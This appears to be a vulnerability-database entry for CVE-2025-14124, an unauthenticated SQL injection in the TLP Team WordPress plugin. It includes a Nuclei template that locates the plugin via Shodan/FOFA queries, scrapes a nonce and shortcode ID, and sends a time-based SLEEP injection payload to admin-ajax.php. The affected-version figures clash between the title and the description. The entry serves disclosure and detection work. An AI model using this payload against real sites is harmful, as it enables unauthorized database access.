Team WordPress Plugin (TLP Team) <= 5.0.9 - SQL Injection
CVE-2025-14124
Verified
Description
Team WordPress plugin <= 5.0.11 contains a SQL injection caused by improper sanitization and escaping of a parameter in an AJAX action accessible to unauthenticated users, letting remote attackers execute arbitrary SQL commands.
Severity
High
CVSS Score
8.6
Exploit Probability
7%
Affected Product
tlp-team
Published Date
April 10, 2026
Template Author
neosmith1, 0x_akoko
CVE-2025-14124.yaml
id: CVE-2025-14124
info:
name: Team WordPress Plugin (TLP Team) <= 5.0.9 - SQL Injection
author: neosmith1,0x_Akoko
severity: high
description: |
Team WordPress plugin <= 5.0.11 contains a SQL injection caused by improper sanitization and escaping of a parameter in an AJAX action accessible to unauthenticated users, letting remote attackers execute arbitrary SQL commands.
impact: |
Remote attackers can execute arbitrary SQL commands, potentially leading to data disclosure or modification.
remediation: |
Update to version 5.0.11 or later.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tlp-team/team-509-unauthenticated-sql-injection
- https://plugins.trac.wordpress.org/changeset/3276890/tlp-team
- https://nvd.nist.gov/vuln/detail/CVE-2025-14124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2025-14124
epss-score: 0.06744
epss-percentile: 0.91309
cwe-id: CWE-89
metadata:
verified: true
max-request: 5
vendor: jeweltheme
product: tlp-team
fofa-query: body="tlp-team" || body="rt-team-container"
shodan-query: http.html:"tlp-team"
tags: cve,cve2025,sqli,wordpress,wp,wp-plugin,tlp-team
flow: http(1) && (http(2) || http(3)) && http(4) && http(5)
http:
- raw:
- |
GET /wp-content/plugins/tlp-team/assets/css/tlpteam.css HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
internal: true
- raw:
- |
GET /wp-json/wp/v2/posts?per_page=100&search=team HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: post_id
group: 1
regex:
- '"id":(\d+),"date"'
internal: true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "rt-team-container")
condition: and
internal: true
- raw:
- |
GET /wp-json/wp/v2/pages?per_page=100&search=team HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: post_id
group: 1
regex:
- '"id":(\d+),"date"'
internal: true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "rt-team-container")
condition: and
internal: true
- raw:
- |
GET /?p={{post_id}} HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
extractors:
- type: regex
name: nonce
group: 1
regex:
- 'var\s+ttp\s*=\s*\{[^}]*"nonce"\s*:\s*"([a-z0-9]+)"'
internal: true
- type: regex
name: sc_id
group: 1
regex:
- "data-sc-id='([0-9]+)'"
internal: true
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, "rt-team-container")
- nonce != ""
- sc_id != ""
condition: and
internal: true
- raw:
- |
@timeout: 25s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=ttp_Layout_Ajax_Action&search=%27+AND+(SELECT+1+FROM+(SELECT+SLEEP(6))x)+AND+%271&tlp_nonce={{nonce}}&scID={{sc_id}}
matchers:
- type: dsl
dsl:
- duration >= 6
- status_code == 200
condition: and
# digest: 4a0a0047304502207b24d230bf10d34d10de0fd36b70d6b792c2c1112a9ca50db297d138b45dccf4022100ee05c856131e295d938496ad3ec42a516faf3b0a3f598f7b2e0f002953520c1c:922c64590222798bb761d5b6d8e729508.6Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
CVE ID:
cve-2025-14124
CWE ID:
cwe-89
Remediation Steps
Update to version 5.0.11 or later.